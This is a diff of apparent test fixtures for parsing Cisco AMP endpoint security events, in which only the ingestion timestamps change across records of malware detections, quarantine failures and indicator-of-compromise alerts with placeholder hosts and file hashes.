@@ -1216,7 +1216,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222479200Z", + "ingested": "2021-12-14T14:40:34.011389466Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1289,7 +1289,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222483300Z", + "ingested": "2021-12-14T14:40:34.011389987Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1362,7 +1362,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222488100Z", + "ingested": "2021-12-14T14:40:34.011390578Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1435,7 +1435,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222493900Z", + "ingested": "2021-12-14T14:40:34.011391041Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1508,7 +1508,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222498300Z", + "ingested": "2021-12-14T14:40:34.011391475Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1602,7 +1602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222502500Z", + "ingested": "2021-12-14T14:40:34.011391928Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -1686,7 +1686,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222506Z", + "ingested": "2021-12-14T14:40:34.011392418Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -1776,7 +1776,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222510400Z", + "ingested": "2021-12-14T14:40:34.011393061Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648173", "kind": "alert", 
@@ -1855,7 +1855,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222516300Z", + "ingested": "2021-12-14T14:40:34.011393474Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", "code": "1107296274", "kind": "alert", @@ -1936,7 +1936,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222522400Z", + "ingested": "2021-12-14T14:40:34.011394003Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", "code": "1107296278", "kind": "alert", 
@@ -2018,7 +2018,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222528100Z", + "ingested": "2021-12-14T14:40:34.011394427Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648173", "kind": "alert", 
@@ -2082,7 +2082,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222533800Z", + "ingested": "2021-12-14T14:40:34.011394840Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", 
@@ -2146,7 +2146,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222539400Z", + "ingested": "2021-12-14T14:40:34.011395242Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -2222,7 +2222,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222545Z", + "ingested": "2021-12-14T14:40:34.011395748Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648155", "kind": "alert", 
@@ -2300,7 +2300,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222550700Z", + "ingested": "2021-12-14T14:40:34.011396286Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2384,7 +2384,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222556400Z", + "ingested": "2021-12-14T14:40:34.011396749Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2464,7 +2464,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222562Z", + "ingested": "2021-12-14T14:40:34.011397171Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
